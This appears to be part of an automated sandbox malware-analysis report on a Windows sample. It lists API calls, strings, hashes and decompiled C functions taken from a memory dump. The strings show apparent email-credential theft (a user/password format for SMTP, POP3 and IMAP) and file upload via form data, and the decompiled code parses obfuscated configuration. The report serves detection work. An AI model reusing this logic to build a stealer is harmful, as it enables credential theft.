Part of subcall function 05426376: RtlEnterCriticalSection.NTDLL(05958D20), ref: 0542638C
Part of subcall function 05426376: RtlLeaveCriticalSection.NTDLL(05958D20), ref: 054263A7

HeapFree.KERNEL32(00000000,?,?,00000000,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 05409338
HeapFree.KERNEL32(00000000,?), ref: 05409344

Strings

Content-Disposition: form-data; name="upload_file"; filename="%s", xrefs: 054092D5
Content-Type: application/octet-stream, xrefs: 054092CD

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
String ID: Content-Disposition: form-data; name="upload_file"; filename="%s"$Content-Type: application/octet-stream
API String ID: 3553201432-2405033784
Opcode ID: 580e31563b82abd73e9025b3c659507a4d1f72fae66c8cbaf19d14308c580375
Instruction ID: 8ef2c0bb48828924a35bc9e5bb423e9b97019755f1946790fae0e87c138e1def
Opcode Fuzzy Hash: 580e31563b82abd73e9025b3c659507a4d1f72fae66c8cbaf19d14308c580375
Instruction Fuzzy Hash: 33213676800269BBCF219F96CC49CDFBFB9FB48740F904426F914A2151C7718621DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0541ECF6, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 72stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,75145520,?,00000000,?,?,0541615A,?,00000000,?,00000000,00000000,?,?,05401EA7,?), ref: 0541ED07

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

Part of subcall function 05419238: memset.NTDLL ref: 05419240

Part of subcall function 05423252: lstrlen.KERNEL32(054160B5,00000008,054160B5,00000000,?,?,054032DF,054160B5,054160B5,00000000,00000008,0000EA60,00000000,?,?,05420742), ref: 0542325E
Part of subcall function 05423252: memcpy.NTDLL(00000000,054160B5,054160B5,054160B5,00000001,00000001,?,?,054032DF,054160B5,054160B5,00000000,00000008,0000EA60,00000000), ref: 054232BC
Part of subcall function 05423252: lstrcpy.KERNEL32(00000000,00000000), ref: 054232CC

lstrcpy.KERNEL32(00000038,?), ref: 0541ED42

Strings

Connection:, xrefs: 0541ED7E
GET, xrefs: 0541ED56
Accept-Encoding:, xrefs: 0541ED6A
Host:, xrefs: 0541ED60
User-Agent:, xrefs: 0541ED74

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocateHeapmemcpymemset
String ID: Accept-Encoding:$Connection:$GET$Host:$User-Agent:
API String ID: 3405161297-3467890120
Opcode ID: 93071db31dc2cce800e62776ba37ad9df0f67d83b02256165475e2e45e1cc52b
Instruction ID: cd15a5b438c7787659f6cc0458040c4e7283ff38f3225e1e6a6367f966bc6234
Opcode Fuzzy Hash: 93071db31dc2cce800e62776ba37ad9df0f67d83b02256165475e2e45e1cc52b
Instruction Fuzzy Hash: 8A11CE71300225BACB54BFB6CD89DEF7FBDAF91280791002FFD06E6240EA70C9259665

Uniqueness

Uniqueness Score: -1.00%

Function 05414DE2, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD5E
Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD77
Part of subcall function 0540DD4C: GetCurrentThreadId.KERNEL32 ref: 0540DD84
Part of subcall function 0540DD4C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD90
Part of subcall function 0540DD4C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD9E
Part of subcall function 0540DD4C: lstrcpy.KERNEL32(00000000), ref: 0540DDC0

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,0540B4F2,00000001), ref: 05414E23
HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,0540B4F2,00000001,00000000,?,00000000,?,?), ref: 05414E96

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: d171117d74a2e053cada76179c884fb25ce6c836a6eab3ac7c38649216e02f8f
Instruction ID: 564f43dafe8bab7b2b774ab0d0a29a171c30e2286bd26a814ede1ca1ecaa09ec
Opcode Fuzzy Hash: d171117d74a2e053cada76179c884fb25ce6c836a6eab3ac7c38649216e02f8f
Instruction Fuzzy Hash: 28112371285734BFDA312B61EC4EFEF3F6DEB417A0F414122FA01A51D0DA624816C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 0541F1BA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0541A506: lstrlen.KERNEL32(00000000,00000000,751881D0,00000000,?,?,?,0541F1D4,253D7325,00000000,751881D0,00000000,?,?,0541331C,00000000), ref: 0541A56D
Part of subcall function 0541A506: sprintf.NTDLL ref: 0541A58E

lstrlen.KERNEL32(00000000,253D7325,00000000,751881D0,00000000,?,?,0541331C,00000000,05958D60), ref: 0541F1E5
lstrlen.KERNEL32(?,?,?,0541331C,00000000,05958D60), ref: 0541F1ED

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

strcpy.NTDLL ref: 0541F204
lstrcat.KERNEL32(00000000,?), ref: 0541F20F

Part of subcall function 05401ABE: lstrlen.KERNEL32(?,?,?,?,00000001), ref: 05401AD5

Part of subcall function 05408AC2: HeapFree.KERNEL32(00000000,00000000,05421258,00000000), ref: 05408ACE

StrTrimA.SHLWAPI(00000000,=,00000000,?,?,0541331C,00000000,05958D60), ref: 0541F22C

Part of subcall function 05416DF6: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,0541F238,00000000,?,?,0541331C,00000000,05958D60), ref: 05416E00
Part of subcall function 05416DF6: _snprintf.NTDLL ref: 05416E5E

Strings

=, xrefs: 0541F226

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: fe7bd7e51e82bf9c057ed89f800f442ec06f38d669fbad172020e97edc3c8231
Instruction ID: d22dc0fb1aebd2a623670d09510736283cf5a16c3fc445f7b46d882c687a6e4f
Opcode Fuzzy Hash: fe7bd7e51e82bf9c057ed89f800f442ec06f38d669fbad172020e97edc3c8231
Instruction Fuzzy Hash: 88110A33B01234774722ABB68C48DEF3B9DAF85650319002BFD04AB200DE74DD069BB5

Uniqueness

Uniqueness Score: -1.00%

Function 0277140D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0277140D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x277d230; // 0x27ba5a8
				_t1 = _t9 + 0x277e61b; // 0x253d7325
				_t36 = 0;
				_t28 = E02775680(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t6 =  *_t40(_a4) + 1; // 0x4f39631
					_t41 = E027775C4(_v8 + _t6);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E0277A7A2(_t34, _t41, _a8);
						E02774C31(_t41);
						_t42 = E02778668(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02774C31(_t36);
							_t36 = _t42;
						}
						_t43 = E027771BA(_t36, _t33);
						if(_t43 != 0) {
							E02774C31(_t36);
							_t36 = _t43;
						}
					}
					E02774C31(_t28);
				}
				return _t36;
			}

0x0277140d
0x02771410
0x02771411
0x02771419
0x02771420
0x02771427
0x0277142b
0x02771431
0x02771438
0x0277143d
0x02771445
0x0277144f
0x02771453
0x02771457
0x0277145d
0x02771462
0x02771472
0x02771474
0x0277148b
0x0277148f
0x02771492
0x02771497
0x02771497
0x027714a0
0x027714a4
0x027714a7
0x027714ac
0x027714ac
0x027714a4
0x027714af
0x027714af
0x027714ba

APIs

Part of subcall function 02775680: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02771427,253D7325,00000000,00000000,00000000,?,00000000,02776C79), ref: 027756E7
Part of subcall function 02775680: sprintf.NTDLL ref: 02775708

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,02776C79,00000000,04F39630), ref: 02771438
lstrlen.KERNEL32(00000000,?,00000000,02776C79,00000000,04F39630), ref: 02771440

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

strcpy.NTDLL ref: 02771457
lstrcat.KERNEL32(00000000,00000000), ref: 02771462

Part of subcall function 0277A7A2: lstrlen.KERNEL32(00000000,00000000,02776C79,02776C79,00000001,00000000,00000000,?,02771471,00000000,02776C79,?,00000000,02776C79,00000000,04F39630), ref: 0277A7B9

Part of subcall function 02774C31: RtlFreeHeap.NTDLL(00000000,00000000,02775130,00000000,?,?,00000000,?,?,?,?,?,?,02778792,00000000), ref: 02774C3D

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02776C79,?,00000000,02776C79,00000000,04F39630), ref: 0277147F

Part of subcall function 02778668: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,0277148B,00000000,?,00000000,02776C79,00000000,04F39630), ref: 02778672
Part of subcall function 02778668: _snprintf.NTDLL ref: 027786D0

Strings

=, xrefs: 02771479

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 90fa6786aeb9a7d6cbb69ba60f6639781c0275d82437f0eec852ecd6df783135
Instruction ID: 57440b3614683b4dd1567fcc8ea037e52f20887f2540afb6a7e5b652385d91d2
Opcode Fuzzy Hash: 90fa6786aeb9a7d6cbb69ba60f6639781c0275d82437f0eec852ecd6df783135
Instruction Fuzzy Hash: 5A118633A012297B8F137BB49C88D6F36AE9F45B643464425F904A7200DF34DD069BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0540E625, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?,000000FF,?,?,05417D16,?,00000000), ref: 0540E640
lstrlen.KERNEL32( | "%s" | %u,?,?,05417D16,?,00000000), ref: 0540E64B
RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0540E65C

Part of subcall function 0541EC4D: GetLocalTime.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0541EC57
Part of subcall function 0541EC4D: wsprintfA.USER32 ref: 0541EC8A

wsprintfA.USER32 ref: 0540E67F

Part of subcall function 054041B3: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,0540E6A7,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 054041D1
Part of subcall function 054041B3: wsprintfA.USER32 ref: 054041EF

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 0540E6B0

Strings

| "%s" | %u, xrefs: 0540E642, 0540E647, 0540E67A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
String ID: | "%s" | %u
API String ID: 3847261958-3278422759
Opcode ID: 1a8c039dfc03e21cdfa5dbc37ca02eca2dad2dfd919d3e1cef4badeb38b04e52
Instruction ID: 7d257adac0f8af7602ea0a0384eea8f6e6dcf9a2a42ca6c448e7a9e763ded157
Opcode Fuzzy Hash: 1a8c039dfc03e21cdfa5dbc37ca02eca2dad2dfd919d3e1cef4badeb38b04e52
Instruction Fuzzy Hash: 3E11C171A10128FFDB209B65DC49DEE7FADFB44254BA04426FD04D3140DA318E618BA0

Uniqueness

Uniqueness Score: -1.00%

Function 05422904, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD5E
Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD77
Part of subcall function 0540DD4C: GetCurrentThreadId.KERNEL32 ref: 0540DD84
Part of subcall function 0540DD4C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD90
Part of subcall function 0540DD4C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD9E
Part of subcall function 0540DD4C: lstrcpy.KERNEL32(00000000), ref: 0540DDC0

lstrcpy.KERNEL32(-000000FC,00000000), ref: 0542293E
CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,05411BE5,?,?,?), ref: 05422950
GetTickCount.KERNEL32 ref: 0542295B
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,05411BE5,?,?,?), ref: 05422967
lstrcpy.KERNEL32(00000000), ref: 05422981

Strings

\Low, xrefs: 05422930

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
String ID: \Low
API String ID: 1629304206-4112222293
Opcode ID: 3f7537cdf2c2fbaf7c6bb791bbca62d20124a71c0e5a81144192f1f6d384e04c
Instruction ID: 535f3919e3c780cb842c5a04be0142ba5515b556292a187ff21837f8f982c479
Opcode Fuzzy Hash: 3f7537cdf2c2fbaf7c6bb791bbca62d20124a71c0e5a81144192f1f6d384e04c
Instruction Fuzzy Hash: FF014531329A316BD2306A768C09FEF7A9CEF46611BC60062F000D2280CFA4D801CABA

Uniqueness

Uniqueness Score: -1.00%

Function 05408EBC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,Main), ref: 05408EDD
RtlEnterCriticalSection.NTDLL(0542E288), ref: 05408EEF
RtlLeaveCriticalSection.NTDLL(0542E288), ref: 05408F02
lstrcmpi.KERNEL32(0542E2A0,00000000), ref: 05408F23
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05404891,00000000), ref: 05408F37

Strings

Main, xrefs: 05408ED5

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID: Main
API String ID: 1266740956-521822810
Opcode ID: 97b84cbec9f02633c28e2b80077e0092bc8a08abf4e5e3a9a35960b00400ecea
Instruction ID: 637fd9d6ed37d690902ddf82248ab95b147d49e03f170b356b3bd2d6c759ceed
Opcode Fuzzy Hash: 97b84cbec9f02633c28e2b80077e0092bc8a08abf4e5e3a9a35960b00400ecea
Instruction Fuzzy Hash: 6B11E631514224AFDB28DF38C54AAEEBBB9FF04310B50416AF506D3380CB349D118FA0

Uniqueness

Uniqueness Score: -1.00%

Function 05424256, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0542426D

Part of subcall function 0542139D: wcstombs.NTDLL ref: 0542145B

lstrlen.KERNEL32(?,?,?,?,?,0541F0FE,?,?), ref: 05424290
lstrlen.KERNEL32(?,?,?,?,0541F0FE,?,?), ref: 0542429A
memcpy.NTDLL(?,?,00004000,?,?,0541F0FE,?,?), ref: 054242AB
HeapFree.KERNEL32(00000000,?,?,?,?,0541F0FE,?,?), ref: 054242CD

Strings

Access-Control-Allow-Origin:, xrefs: 0542425B

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateFreememcpywcstombs
String ID: Access-Control-Allow-Origin:
API String ID: 1256246205-3194369251
Opcode ID: cc950b4edf127f92332b3615877d59ae8d9cee0d43f26e656222bcdaf9dadb18
Instruction ID: 8c0df61bfdd92e93528bbf15ea452494fa4ca152ad20869e1a11d95601ae1be7
Opcode Fuzzy Hash: cc950b4edf127f92332b3615877d59ae8d9cee0d43f26e656222bcdaf9dadb18
Instruction Fuzzy Hash: D8117C75A00224EFDF249B56EC45FDEBFB9EB852A0F618069F909A2250DA319911CB24

Uniqueness

Uniqueness Score: -1.00%

Function 05411FE5, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 05412069: lstrlen.KERNEL32(?,00000008,75145519,?,00000000,05411AAB,?,054160B5,75145519,05405E05,75145519,?,00000000,?,05404731,?), ref: 05412078
Part of subcall function 05412069: mbstowcs.NTDLL ref: 05412094

lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,0540B553,?), ref: 0541200A
RtlAllocateHeap.NTDLL(00000000,?), ref: 0541201C
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0540B553,?), ref: 05412039
lstrlenW.KERNEL32(00000000,?,?,0540B553,?), ref: 05412045
HeapFree.KERNEL32(00000000,00000000,?,?,0540B553,?), ref: 05412059

Strings

%APPDATA%\Microsoft\, xrefs: 05411FEA

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID: %APPDATA%\Microsoft\
API String ID: 3403466626-2699254172
Opcode ID: 696c18bcba21f72ddb0b0768f035c7b021c06473c1240983c956a99aa23c8932
Instruction ID: 74d91b06655c33a04d010f050952cdc89a0d06432af3582c25461809dc790e9d
Opcode Fuzzy Hash: 696c18bcba21f72ddb0b0768f035c7b021c06473c1240983c956a99aa23c8932
Instruction Fuzzy Hash: 79019E72110224BFD7259BA5DC46FEE7FACEF05250F514051FA01A7250CBB09901CB68

Uniqueness

Uniqueness Score: -1.00%

Function 05408C2E, Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 208stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000104,?,?,?,00000104,?,?,?,00000104,?,?,?), ref: 05408D45
lstrlen.KERNEL32(?,?,?,?,00000104,?,?,?,00000104,?,?,?,00000104,?,?,?), ref: 05408D53

Part of subcall function 05413D65: lstrlen.KERNEL32(?,00000104,?,00000000,05408D2B,?,?,?,?,?,00000104,?,?,?,00000104), ref: 05413D70
Part of subcall function 05413D65: lstrcpy.KERNEL32(00000000,?), ref: 05413D8C

Strings

SMTP, xrefs: 05408DDB
type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S, xrefs: 05408E03
IMAP, xrefs: 05408DF0
POP3, xrefs: 05408DE9, 05408E02

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$lstrcpy
String ID: IMAP$POP3$SMTP$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
API String ID: 805584807-1010173016
Opcode ID: 65e646b3a08e815991c19aa7454a99c2bf52822a45b692a1357ca7bf162a52c4
Instruction ID: b77a0e92def658ec64d069ae8fbec5814516ab704173aaf4d2fd38c1ccd2a363
Opcode Fuzzy Hash: 65e646b3a08e815991c19aa7454a99c2bf52822a45b692a1357ca7bf162a52c4
Instruction Fuzzy Hash: 62713B71A00119EFCF25DFA5C984AEFBBB9BF58604F2541AAE905A3240D7349A51CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05410A52, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

GetLastError.KERNEL32(?,?,?,00001000), ref: 05410AD3
WaitForSingleObject.KERNEL32(00000000,00000000,?,?), ref: 05410B58
CloseHandle.KERNEL32(00000000), ref: 05410B72
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?), ref: 05410BA7

Part of subcall function 0541A02F: RtlReAllocateHeap.NTDLL(00000000,?,?,05421FD9), ref: 0541A03F

WaitForSingleObject.KERNEL32(?,00000064), ref: 05410C29
CloseHandle.KERNEL32(?), ref: 05410C50

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: a3e527fe43c1e478c5d5f733feb814b7777f939301d989f2f9619c6652c407fa
Instruction ID: 2f6e9a8b245c26b1ed3de3b6374106cbf20c888b11e26f38e09140ffaf6aba4e
Opcode Fuzzy Hash: a3e527fe43c1e478c5d5f733feb814b7777f939301d989f2f9619c6652c407fa
Instruction Fuzzy Hash: 35813B71E00219EFDF10DF94C988AEEBBB5FF08344F14845AE909AB251D771A980CF98

Uniqueness

Uniqueness Score: -1.00%

Function 027758CA, Relevance: 9.2, APIs: 6, Instructions: 190
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E027758CA(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				void* _t46;
				void* _t47;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				void* _t74;
				intOrPtr _t90;

				_t75 = __ecx;
				_t20 =  *0x277d22c; // 0x63699bc3
				if(E027733AC( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x277d280 = _v12;
				}
				_t25 =  *0x277d22c; // 0x63699bc3
				if(E027733AC( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t74 = _v12;
					if(_t74 == 0) {
						_t31 = 0;
					} else {
						_t69 =  *0x277d22c; // 0x63699bc3
						_t31 = E02771273(_t75, _t74, _t69 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x277d1f8 = _v8;
						}
					}
					if(_t74 == 0) {
						_t32 = 0;
					} else {
						_t65 =  *0x277d22c; // 0x63699bc3
						_t32 = E02771273(_t75, _t74, _t65 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x277d1fc = _v8;
						}
					}
					if(_t74 == 0) {
						_t33 = 0;
					} else {
						_t61 =  *0x277d22c; // 0x63699bc3
						_t33 = E02771273(_t75, _t74, _t61 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x277d200 = _v8;
						}
					}
					if(_t74 == 0) {
						_t34 = 0;
					} else {
						_t57 =  *0x277d22c; // 0x63699bc3
						_t34 = E02771273(_t75, _t74, _t57 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x277d004 = _v8;
						}
					}
					if(_t74 == 0) {
						_t35 = 0;
					} else {
						_t53 =  *0x277d22c; // 0x63699bc3
						_t35 = E02771273(_t75, _t74, _t53 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x277d02c = _v8;
						}
					}
					if(_t74 == 0) {
						_t36 = 0;
					} else {
						_t49 =  *0x277d22c; // 0x63699bc3
						_t36 = E02771273(_t75, _t74, _t49 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t46 = 0x10;
						_t47 = E027773B3(_t46);
						if(_t47 != 0) {
							_push(_t47);
							E027710E4();
						}
					}
					if(_t74 == 0) {
						_t37 = 0;
					} else {
						_t44 =  *0x277d22c; // 0x63699bc3
						_t37 = E02771273(_t75, _t74, _t44 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E027773B3(0, _t37) != 0) {
						_t90 =  *0x277d2dc; // 0x4f39630
						E02775B10(_t90 + 4, _t42);
					}
					_t38 =  *0x277d230; // 0x27ba5a8
					_t18 = _t38 + 0x277e2d2; // 0x4f3887a
					_t19 = _t38 + 0x277e7c4; // 0x6976612e
					 *0x277d27c = _t18;
					 *0x277d2f4 = _t19;
					HeapFree( *0x277d1f0, 0, _t74);
					L48:
					return 0;
				}
			}

0x027758ca
0x027758cd
0x027758ed
0x027758fb
0x027758fb
0x02775900
0x0277591a
0x02775abd
0x02775abf
0x00000000
0x02775920
0x02775920
0x02775927
0x0277593d
0x02775929
0x02775929
0x02775936
0x02775936
0x02775947
0x02775949
0x02775953
0x02775958
0x02775958
0x02775953
0x0277595f
0x02775975
0x02775961
0x02775961
0x0277596e
0x0277596e
0x02775979
0x0277597b
0x02775985
0x0277598a
0x0277598a
0x02775985
0x02775991
0x027759a7
0x02775993
0x02775993
0x027759a0
0x027759a0
0x027759ab
0x027759ad
0x027759b7
0x027759bc
0x027759bc
0x027759b7
0x027759c3
0x027759d9
0x027759c5
0x027759c5
0x027759d2
0x027759d2
0x027759dd
0x027759df
0x027759e9
0x027759ee
0x027759ee
0x027759e9
0x027759f5
0x02775a0b
0x027759f7
0x027759f7
0x02775a04
0x02775a04
0x02775a0f
0x02775a11
0x02775a1b
0x02775a20
0x02775a20
0x02775a1b
0x02775a27
0x02775a3d
0x02775a29
0x02775a29
0x02775a36
0x02775a36
0x02775a41
0x02775a43
0x02775a46
0x02775a47
0x02775a4e
0x02775a50
0x02775a51
0x02775a51
0x02775a4e
0x02775a58
0x02775a6e
0x02775a5a
0x02775a5a
0x02775a67
0x02775a67
0x02775a72
0x02775a80
0x02775a8a
0x02775a8a
0x02775a8f
0x02775a95
0x02775aa2
0x02775aa8
0x02775aae
0x02775ab3
0x02775ac0
0x02775ac4
0x02775ac4

APIs

StrToIntExA.SHLWAPI(00000000,00000000,027779CC,?,027779CC,63699BC3,?,027779CC,63699BC3,E8FA7DD7,0277D00C,74ECC740,?,?,027779CC), ref: 0277594F
StrToIntExA.SHLWAPI(00000000,00000000,027779CC,?,027779CC,63699BC3,?,027779CC,63699BC3,E8FA7DD7,0277D00C,74ECC740,?,?,027779CC), ref: 02775981
StrToIntExA.SHLWAPI(00000000,00000000,027779CC,?,027779CC,63699BC3,?,027779CC,63699BC3,E8FA7DD7,0277D00C,74ECC740,?,?,027779CC), ref: 027759B3
StrToIntExA.SHLWAPI(00000000,00000000,027779CC,?,027779CC,63699BC3,?,027779CC,63699BC3,E8FA7DD7,0277D00C,74ECC740,?,?,027779CC), ref: 027759E5
StrToIntExA.SHLWAPI(00000000,00000000,027779CC,?,027779CC,63699BC3,?,027779CC,63699BC3,E8FA7DD7,0277D00C,74ECC740,?,?,027779CC), ref: 02775A17
HeapFree.KERNEL32(00000000,?,?,027779CC,63699BC3,?,027779CC,63699BC3,E8FA7DD7,0277D00C,74ECC740,?,?,027779CC), ref: 02775AB3

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
